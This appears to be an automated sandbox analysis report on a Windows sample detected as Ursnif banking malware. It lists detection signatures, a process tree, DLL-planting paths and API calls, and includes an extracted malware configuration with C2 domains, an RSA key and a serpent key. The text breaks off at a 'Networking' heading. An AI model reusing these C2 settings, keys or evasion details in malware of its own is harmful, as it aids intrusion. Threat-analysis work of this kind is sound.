Play interactive tour

Edit tour

Windows Analysis Report o4c8AUtX1g

Overview

General Information

Sample Name:	o4c8AUtX1g (renamed file extension from none to exe)
Analysis ID:	508575
MD5:	c7db399951b19ea446599dc3800a3111
SHA1:	b01352206ec1935a1123d7d4ea8394647e6b3d00
SHA256:	ceba6a7f9a2c25a35090470c6209aefed808786c47194a18415a7898390c20cb
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	69
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	18
Range:	0 - 100

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Detected unpacking (changes PE section rights)

PE file has a writeable .text section

Writes or reads registry keys via WMI

Writes registry values via WMI

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

EXE planting / hijacking vulnerabilities found

Drops files with a non-matching file extension (content does not match file extension)

DLL planting / hijacking vulnerabilities found

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Binary contains a suspicious time stamp

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Process Tree

System is w10x64

o4c8AUtX1g.exe (PID: 3408 cmdline: 'C:\Users\user\Desktop\o4c8AUtX1g.exe' MD5: C7DB399951B19EA446599DC3800A3111)

msiexec.exe (PID: 5944 cmdline: 'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI='' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

msiexec.exe (PID: 5776 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 768 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D90C408BAA115D1625882500CC5A128E C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

msiexec.exe (PID: 6328 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 97E0B76AE09D0E82CE071E7BABCE98E1 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

plcd-player.exe (PID: 4744 cmdline: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe MD5: 25DDBD309BB8094229704383977C7268)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: plcd-player.exe PID: 4744	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.plcd-player.exe.39494a0.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
9.2.plcd-player.exe.39494a0.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
9.2.plcd-player.exe.1270000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 9.2.plcd-player.exe.39494a0.2.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: o4c8AUtX1g.exe

ReversingLabs: Detection: 28%

Source: 9.2.plcd-player.exe.a70000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen8

Privilege Escalation:

Source: C:\Windows\System32\msiexec.exe	EXE: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe			Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	EXE: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe			Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: GLU32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: Secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: WININET.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: OPENGL32.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: libftl2.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll	Jump to behavior

Compliance:

Uses 32bit PE files

Show sources

Source: o4c8AUtX1g.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

EXE planting / hijacking vulnerabilities found

Show sources

Source: C:\Windows\System32\msiexec.exe	EXE: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe			Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	EXE: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe			Jump to behavior

DLL planting / hijacking vulnerabilities found

Show sources

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: GLU32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: Secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: WININET.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: OPENGL32.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	DLL: libftl2.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	DLL: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll	Jump to behavior

Creates license or readme file

Show sources

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt	Jump to behavior

PE / OLE file has a valid certificate

Show sources

Source: o4c8AUtX1g.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: o4c8AUtX1g.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wininet.pdb source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp
Source:	Binary string: c:\Data\SkyDrive\Programming\Projects\Delimon\Delimon.Win32.IO 2013\Win32FileLibrary\obj\Release\Delimon.Win32.IO.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, Delimon.Win32.IO.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: o4c8AUtX1g.exe
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb @ source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdbp source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb] source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbk source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb"" source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb0k source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp
Source:	Binary string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, System.Threading.Tasks.dll.1.dr
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdbSHA256 source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: wininet.pdbUGP source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp
Source:	Binary string: d:\projects\SslCertBinding.Net\src\SslCertBinding.Net\obj\Release\SslCertBinding.Net.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, SslCertBinding.Net.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr

Spreading:

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01342910 FindFirstFileW,FindClose,	1_2_01342910
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01345B80 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	1_2_01345B80
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01346A30 FindFirstFileW,FindClose,	1_2_01346A30
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013294D0 FindFirstFileW,GetLastError,FindClose,	1_2_013294D0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A8740 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,	1_2_012A8740
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013529C0 FindFirstFileW,FindClose,	1_2_013529C0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013640F0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	1_2_013640F0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01328B70 FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,	1_2_01328B70

Networking:

